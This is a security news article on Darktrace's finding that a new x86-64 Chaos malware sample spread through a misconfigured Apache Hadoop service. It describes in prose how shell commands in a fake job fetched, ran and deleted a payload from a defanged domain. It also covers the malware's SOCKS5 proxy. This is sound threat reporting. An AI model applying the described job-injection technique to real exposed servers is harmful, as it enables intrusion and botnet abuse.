New Chaos malware targets cloud misconfigs

Cloud attacks do not always start with a software bug. In Darktrace’s March 2026 honeypot, the attacker got in through an Apache Hadoop service that was simply left misconfigured, then used that opening to drop a new Chaos malware sample on a Linux cloud server. (darktrace.com) Apache Hadoop is a system for splitting huge data jobs across many machines, like breaking one giant spreadsheet into pieces and handing each piece to a different worker. If the service is exposed with the wrong settings, an outsider can send it a job that is really just their own command. (darktrace.com) That is what Darktrace saw here. The attacker sent an Hypertext Transfer Protocol request to Hadoop’s resource manager endpoint, created a fake application, and stuffed shell commands into the job so the server would download and run malware for them. (helpnetsecurity.com) The shell sequence was simple and fast: fetch a file from pan.tenire[.]com, change its permissions so it can run, execute it, and then delete the file from disk. Deleting the file after launch cuts down the evidence left behind for incident responders. (darktrace.com) Chaos is not a brand-new malware family. Lumen’s Black Lotus Labs publicly described it in September 2022 as a Go programming language botnet that could hit Windows, Linux, routers, and enterprise servers, and linked it to distributed denial-of-service attacks and cryptomining. (lumen.com) Earlier Chaos samples mostly chased routers and edge devices, which usually run on ARM, MIPS, or PowerPC chips. The March 2026 sample Darktrace caught was a 64-bit Executable and Linkable Format file for x86-64 Linux, which is the kind of processor setup you expect in cloud servers. (helpnetsecurity.com) The malware also changed shape after it landed. Darktrace said this version dropped some older spreading features, including Secure Shell brute forcing, and kept the parts that let operators hold the machine, survive reboots with systemd, and launch network floods over Hypertext Transfer Protocol, Transmission Control Protocol, User Datagram Protocol, Transport Layer Security, and WebSocket traffic. (helpnetsecurity.com) The new piece is a SOCKS5 proxy. A proxy is a relay box on the internet, like making your call through someone else’s phone, and Darktrace said Chaos can now listen on an attacker-chosen Transmission Control Protocol port and forward the attacker’s traffic through the victim server. (helpnetsecurity.com) That changes what an infected cloud server is worth. Instead of using the box only for cryptomining or a denial-of-service flood, the operator can also rent or use that server as a hidden jump point, making later attacks appear to come from the victim’s internet address and reaching internal systems that only the victim server can see. (darktrace.com) Darktrace also noted that the download domain had shown up before in Operation Silk Lure, a campaign tied to ValleyRAT malware delivered through fake job application lures. That does not prove the same crew is behind both operations, but it does show that one exposed cloud service can pull a company into a much wider criminal infrastructure. (darktrace.com)